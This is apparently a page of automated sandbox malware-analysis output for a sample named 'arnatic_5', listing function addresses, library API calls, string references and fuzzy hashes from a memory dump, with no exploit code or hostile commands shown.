Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$4
API String ID: 1170836740-1656380668
Opcode ID: 7da3d7738064e6237d8b5e90ec6493a73e44bc8ad65c3b0136840160973e3472
Instruction ID: 75b7d06418e0a755e191a2b46a71ff34c34f292ed9313df0448b2f2260b47592
Opcode Fuzzy Hash: 7da3d7738064e6237d8b5e90ec6493a73e44bc8ad65c3b0136840160973e3472
Instruction Fuzzy Hash: D341CE34A013099FCF10DF68D890A9EBBF4AF45369F249595EC18BB392D731DA09CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E63A07, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 00E63A58

Strings

@#, xrefs: 00E63AD2, 00E63AD5
<4, xrefs: 00E63A76, 00E63A88, 00E63A79, 00E63A8B
4, xrefs: 00E63A95
8#, xrefs: 00E63A36, 00E63A40

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Decorator::getDimensionSigned
String ID: 8#$<4$@#$4
API String ID: 2996861206-1523773737
Opcode ID: 8d0e673104d0d628ca10ed49111bfae4c85690e10baf610a7731688e4d09b56e
Instruction ID: 711775f902608215e2c03b4f05094b9d3a7663093bcf7cadfc46587746a2ba6f
Opcode Fuzzy Hash: 8d0e673104d0d628ca10ed49111bfae4c85690e10baf610a7731688e4d09b56e
Instruction Fuzzy Hash: 1E319171D042499FDF18DFA5E956BEEB7F8AB08344F10105EE601B3280DB785B09DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00E666D3, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Strings

)', xrefs: 00E668D4, 00E6673D, 00E66833

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID:
String ID: )'
API String ID: 0-1126549300
Opcode ID: 9b094c0abdb124bc996e7b7828dc9b782d7d81db1b1daf9bec2cad02764f4d8a
Instruction ID: 37604a737436c862381d73dd0d5936c045f57c26fd38f5ae2251c2e197399c46
Opcode Fuzzy Hash: 9b094c0abdb124bc996e7b7828dc9b782d7d81db1b1daf9bec2cad02764f4d8a
Instruction Fuzzy Hash: 2C71F631D602169FCF258F68E844ABFBBB9EF813D8F142229E85077191DB709D85C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E704C9, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E751F3: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E38A82,?,?,00E91F4B), ref: 00E75225

_free.LIBCMT ref: 00E705D4
_free.LIBCMT ref: 00E705EB
_free.LIBCMT ref: 00E7060A
_free.LIBCMT ref: 00E70625
_free.LIBCMT ref: 00E7063C

Strings

7, xrefs: 00E705AE

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: 7
API String ID: 3033488037-1921011270
Opcode ID: 28e2df45899c064aa0126d1504d47205048450f0f7d32c5584dd6bbceb0ae871
Instruction ID: 50d9fe2e5d62725e1dfd8d86f8d02dc9e2f16c01aef26b8dca0a57b9df4c649e
Opcode Fuzzy Hash: 28e2df45899c064aa0126d1504d47205048450f0f7d32c5584dd6bbceb0ae871
Instruction Fuzzy Hash: 1751C071A00205EFDB20DF69DD41B6AB7F4EF88724F14A569E90DF7290E771EA118B80

Uniqueness

Uniqueness Score: -1.00%

Function 00E71919, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,0000D8C4,?,?,?,?,?,?,?,?,00E720AB,?,0000D8C4,00000000,?,0000D8C4), ref: 00E7195B
__fassign.LIBCMT ref: 00E719DD
__fassign.LIBCMT ref: 00E719FC
WideCharToMultiByte.KERNEL32(?,00000000,0000D8C4,00000001,00000000,00000005,00000000,00000000), ref: 00E71A29
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00E720AB), ref: 00E71A48
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00E720AB), ref: 00E71A81

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 839fcf0600766fa43af307c4592efd0c18cd6aabfc7089741310e68e21cf8751
Instruction ID: e39e7359a7e57e8c321eff67b0de2a4fb946d0828a1421274756af45104b37af
Opcode Fuzzy Hash: 839fcf0600766fa43af307c4592efd0c18cd6aabfc7089741310e68e21cf8751
Instruction Fuzzy Hash: B2518E70A01349AFCB10CFA8D881AEEBBF8EF09310F14955AE559F7291D771DA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E27A10, Relevance: 10.6, APIs: 7, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E27A1E
std::_Lockit::_Lockit.LIBCPMT ref: 00E27A37
std::_Lockit::~_Lockit.LIBCPMT ref: 00E27A57
std::_Lockit::~_Lockit.LIBCPMT ref: 00E27AA6
__Getctype.LIBCPMT ref: 00E27AF8
std::_Facet_Register.LIBCPMT ref: 00E27B23
std::_Lockit::~_Lockit.LIBCPMT ref: 00E27B67

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
String ID:
API String ID: 2525760861-0
Opcode ID: bde9d89bf5e2a43780166f4ce157cead7464bc9672cd0a5b3e17e36ecbdd2090
Instruction ID: 505b0c5510fa4da955113a43ba457a57670483fac6a19b8b4c39c7498400ead5
Opcode Fuzzy Hash: bde9d89bf5e2a43780166f4ce157cead7464bc9672cd0a5b3e17e36ecbdd2090
Instruction Fuzzy Hash: 4A41E671A042249FCB24DF54E484AAEB7F4EF44320F1490ADE859BB352DB70EE45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E76BFA, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00E76C50
ext-ms-, xrefs: 00E76C64

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: c05e90813f1e596b35fc02447c51bacf48f9daf6e42c313f2fc65954d7ed0832
Instruction ID: 37ebccf4c36be871d7914f887075032ae34a2c55645e61f1ced66aa6b33b014b
Opcode Fuzzy Hash: c05e90813f1e596b35fc02447c51bacf48f9daf6e42c313f2fc65954d7ed0832
Instruction Fuzzy Hash: 0E210872A01A15AFDB338B29DD45B6AB798DB05768F11A620FD8EB7290D770ED0085D0

Uniqueness

Uniqueness Score: -1.00%

Function 00E7979B, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E794E2: _free.LIBCMT ref: 00E7950B

_free.LIBCMT ref: 00E797E9

Part of subcall function 00E7494E: RtlFreeHeap.NTDLL(00000000,00000000,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?), ref: 00E74964
Part of subcall function 00E7494E: GetLastError.KERNEL32(?,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?,?), ref: 00E74976

_free.LIBCMT ref: 00E797F4
_free.LIBCMT ref: 00E797FF
_free.LIBCMT ref: 00E79853
_free.LIBCMT ref: 00E7985E
_free.LIBCMT ref: 00E79869
_free.LIBCMT ref: 00E79874

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 69129f4bf81b576dbc9440a04e38baed74c248ad5aabb6fa2f3f5fcef6a52c50
Instruction ID: 63d53a8cb83f21609418164a32599864d52284b3fc13bbc339301df2b453bc93
Opcode Fuzzy Hash: 69129f4bf81b576dbc9440a04e38baed74c248ad5aabb6fa2f3f5fcef6a52c50
Instruction Fuzzy Hash: E4115C71541B0DAAD930BBB0CC87FCB77DD6F40700F409818B2AE76093EB28A5064650

Uniqueness

Uniqueness Score: -1.00%

Function 00E6940F, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E693C0,00E69388), ref: 00E6942F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E69442
FreeLibrary.KERNEL32(00000000,?,?,?,00E693C0,00E69388), ref: 00E69465

Strings

4, xrefs: 00E69453
CorExitProcess, xrefs: 00E6943A
mscoree.dll, xrefs: 00E69428

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$4
API String ID: 4061214504-2957334682
Opcode ID: 8a70e7916cc1b0a5ae9b2b79fad71e277e8f1b73947217765290c3249bbb81e2
Instruction ID: 393f3631724cfede6d116c93b5dbe36559a212883307b7e50ebefde85f90fab7
Opcode Fuzzy Hash: 8a70e7916cc1b0a5ae9b2b79fad71e277e8f1b73947217765290c3249bbb81e2
Instruction Fuzzy Hash: F6F0AF30A51208BFCB109FA5EC19FAEBFB8EF04752F004268F905B21A1CF709E45CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00E77527, Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E67AD9,00E67AD9,?,?,?,00E77778,00000001,00000001,?), ref: 00E77581
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E77778,00000001,00000001,?,?,?,?), ref: 00E77607
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E77701
__freea.LIBCMT ref: 00E7770E

Part of subcall function 00E751F3: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E38A82,?,?,00E91F4B), ref: 00E75225

__freea.LIBCMT ref: 00E77717
__freea.LIBCMT ref: 00E7773C

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 661dbcbcce930e40f7c7e99469761e49583479c69e634219dae9aac73587ac2e
Instruction ID: 6dea0a5e1fe0d717238f4b7ec3816d9204b3673d7de8e36293f90e684f74c094
Opcode Fuzzy Hash: 661dbcbcce930e40f7c7e99469761e49583479c69e634219dae9aac73587ac2e
Instruction Fuzzy Hash: DB51F272614206AFDB299F64CC81EBB77AAEB80754F149669FC4CF6180EB74DC50C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E61349, Relevance: 9.1, APIs: 6, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00E6139F
DName::operator+.LIBCMT ref: 00E613B9
DName::DName.LIBVCRUNTIME ref: 00E613D6

Part of subcall function 00E5ECFE: __aulldvrm.LIBCMT ref: 00E5ED2F

DName::DName.LIBVCRUNTIME ref: 00E6144C
DName::DName.LIBVCRUNTIME ref: 00E61459
DName::DName.LIBVCRUNTIME ref: 00E6147C

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: ab348ac559ae6ec8a510af8a4910aedc4372a3a3a3a95d600090a7c70398ad09
Instruction ID: ee835d6ebb4b9ae189b4e46891082d14b9e20b5e602b7acfa857b693184a302a
Opcode Fuzzy Hash: ab348ac559ae6ec8a510af8a4910aedc4372a3a3a3a95d600090a7c70398ad09
Instruction Fuzzy Hash: 6D413AB28841889EDB1DCF64E840BE97BB9AF42384F0C60DDE5667B391DB308909CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00E28AC0, Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E28ACE
std::_Lockit::_Lockit.LIBCPMT ref: 00E28AE7
std::_Lockit::~_Lockit.LIBCPMT ref: 00E28B07
std::_Lockit::~_Lockit.LIBCPMT ref: 00E28B56
std::_Facet_Register.LIBCPMT ref: 00E28BAF
std::_Lockit::~_Lockit.LIBCPMT ref: 00E28BF3

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
String ID:
API String ID: 1858714459-0
Opcode ID: 78ed09c1e3d3015372d1b2fc0bb3723a16fdcdd5d400d14a72372f9052bdc2ec
Instruction ID: 67e6d327c89316cce3734e21e684cf2221cccdd3d498c00031d5a04cb619524d
Opcode Fuzzy Hash: 78ed09c1e3d3015372d1b2fc0bb3723a16fdcdd5d400d14a72372f9052bdc2ec
Instruction Fuzzy Hash: B341C175A021289FCB24DF54E581AA9B7F8EF54314F14509DF909BB222DF70AE45CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00E627F3, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBVCRUNTIME ref: 00E62856
DName::operator+.LIBCMT ref: 00E62914
operator+.LIBVCRUNTIME ref: 00E62953

Strings

(&, xrefs: 00E628FE, 00E62901
8#, xrefs: 00E6284F, 00E62832

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: operator+$Name::operator+
String ID: (&$8#
API String ID: 1198235884-1975015124
Opcode ID: 3bcaf380059528c835ab79045eeb8919a1a3cff201da986f906bc84e20489def
Instruction ID: 6b2297a11c43752764a877a7fbad76e09fe8047e56ff8353f4a8d6e4063aff47
Opcode Fuzzy Hash: 3bcaf380059528c835ab79045eeb8919a1a3cff201da986f906bc84e20489def
Instruction Fuzzy Hash: E5416770D0464AAFDF18CF50E846BEE7BF5AB40398F04A49DE7147B291C7759A49CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E38EDE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00E38E7B,00000064), ref: 00E38F01
LeaveCriticalSection.KERNEL32(00EE0B14,?,?,00E38E7B,00000064,?,00E94557,00EE2F54), ref: 00E38F0B
WaitForSingleObjectEx.KERNEL32(?,00000000,?,00E38E7B,00000064,?,00E94557,00EE2F54), ref: 00E38F1C
EnterCriticalSection.KERNEL32(00EE0B14,?,00E38E7B,00000064,?,00E94557,00EE2F54), ref: 00E38F23

Strings

4, xrefs: 00E38EFB

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: 4
API String ID: 3269011525-1614143912
Opcode ID: 2801cd5e601ea100f4ed22e0a01bdc7479939e7d5e39702e40ee482d68a6ff40
Instruction ID: ac93afd7124386f4e902130092d1aa1135ef56090c637f6bc2fda848d6319edb
Opcode Fuzzy Hash: 2801cd5e601ea100f4ed22e0a01bdc7479939e7d5e39702e40ee482d68a6ff40
Instruction Fuzzy Hash: 3EE0ED3564526CEFC6112B93EC09E9A7E19FB08759F001111F5157A160CBE159849BD4

Uniqueness

Uniqueness Score: -1.00%

Function 00E750A0, Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00E680B6,00E75236,?,?,00E38A82,?,?,00E91F4B), ref: 00E750A5
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00E680B6,00E75236,?,?,00E38A82,?,?,00E91F4B), ref: 00E750CB
_free.LIBCMT ref: 00E7510B
_free.LIBCMT ref: 00E7513E
SetLastError.KERNEL32(00000000), ref: 00E7514B

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 708991afcf8ed8aa55f358bf509538c28ecf0c9d62f7af3ca2bab45e167bc8e3
Instruction ID: 631dba43888aacffe88b4cdbbdc41d4e19237eb9996e251d3d5d3dede105d234
Opcode Fuzzy Hash: 708991afcf8ed8aa55f358bf509538c28ecf0c9d62f7af3ca2bab45e167bc8e3
Instruction Fuzzy Hash: C411E973211E056AC625273ABC46A6B2299EB82779735E215F52DB31E1DFB08C058264

Uniqueness

Uniqueness Score: -1.00%

Function 00E7925D, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E79275

Part of subcall function 00E7494E: RtlFreeHeap.NTDLL(00000000,00000000,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?), ref: 00E74964
Part of subcall function 00E7494E: GetLastError.KERNEL32(?,?,00E79510,?,00000000,?,00000000,?,00E797B4,?,00000007,?,?,00E79CC5,?,?), ref: 00E74976

_free.LIBCMT ref: 00E79287
_free.LIBCMT ref: 00E79299
_free.LIBCMT ref: 00E792AB
_free.LIBCMT ref: 00E792BD

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f099d6b2c0ca7a990f27c2e1969bb306a247368c2895c7d028c69f7b854de02c
Instruction ID: b914e5bf16bf5c81e3bb932b27e81ddfdb8f9c0987d8ee9656a315cd6f3d23e0
Opcode Fuzzy Hash: f099d6b2c0ca7a990f27c2e1969bb306a247368c2895c7d028c69f7b854de02c
Instruction Fuzzy Hash: 8CF012725056A6BB8A20EB69F982C1773E9EF40764764AC06F54CF7563C730FC808B60

Uniqueness

Uniqueness Score: -1.00%

Function 00E3CD00, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E3CF82

Strings

\, xrefs: 00E3CD2F, 00E3CD37
\, xrefs: 00E3CD21, 00E3CF11
is not a valid derived key length, xrefs: 00E3CDB9

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ___std_exception_copy
String ID: is not a valid derived key length$\$\
API String ID: 2659868963-2758568642
